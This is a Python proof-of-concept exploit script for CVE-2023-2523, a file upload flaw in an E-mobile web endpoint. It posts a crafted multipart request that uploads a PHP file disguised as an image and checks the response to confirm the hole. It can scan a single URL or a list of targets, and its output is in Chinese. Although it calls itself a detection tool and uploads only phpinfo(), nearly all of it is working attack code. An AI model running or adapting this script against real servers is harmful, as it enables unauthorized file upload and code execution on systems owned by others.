import requests
import argparse


def Banner():
    banner = """                                           
      ______     _______     ____   ___ ____  _____      ____  ____ ____  _
 / ___\ \   / / ____|   |___ \ / _ \___ \|___ /     |___ \| ___|___ \|___ / 
| |    \ \ / /|  _| _____ __) | | | |__) | |_ \ _____ __) |___ \ __) | |_ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____/ __/ ___) / __/ ___) |
 \____|  \_/  |_____|   |_____|\___/_____|____/     |_____|____/_____|____/ 
                                                                                 
                                         
    Usage:python3  CVE-2023-2523.py -u https://127.0.0.1:8080
    Usage:python3  CVE-2023-2523.py -f urls.txt 
    
        """
    print(banner)

def exploit_target(url, result_file):
    path = "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save"
    full_url = url + path

    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": "null",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
        "Connection": "close",
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt"
    }

    data = (
        "------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\r\n"
        "Content-Disposition: form-data; name=\"upload_quwan\"; filename=\"test.php.\"\r\n"
        "Content-Type: image/jpeg\r\n"
        "\r\n"
        "<?php phpinfo();?>\r\n"
        "------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\r\n"
        "Content-Disposition: form-data; name=\"file\"; filename=\"\"\r\n"
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        "\r\n"
        "------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--"
    )

    response = requests.post(full_url, headers=headers, data=data)

    if response.status_code == 200 and "php" in response.text:
        print(url + "[+] 漏洞存在，请根据输出结果，拼接出 phpinfo 的访问路径:")
        print(response.text)
        print("地址拼接举例::https://127.0.0.1:8080/attachment/1329245871/test.php")
        result_file.write(f"[+] 漏洞存在 - {url}\n")
        result_file.write(response.text)  # 将响应内容写入结果文件
    else:
        print("[-] 漏洞不存在")

def main():
    parser = argparse.ArgumentParser(description="CVE-2023-2523 检测工具 by 冰糖葫芦(脚本使用phpinfo文件上传)")
    parser.add_argument("-u", "--target", help="单个目标URL")
    parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
    args = parser.parse_args()

    if args.target:
        target_urls = [args.target]
    elif args.file:
        with open(args.file, "r") as f:
            target_urls = f.read().splitlines()
    else:
        print("请使用 -u 指定目标 或 -f 指定目标文件")
        return

    result_file = open("cve-2023-2523-result.txt", "a")

    for url in target_urls:
        exploit_target(url, result_file)

    result_file.close()

if __name__ == "__main__":
    Banner()
    main()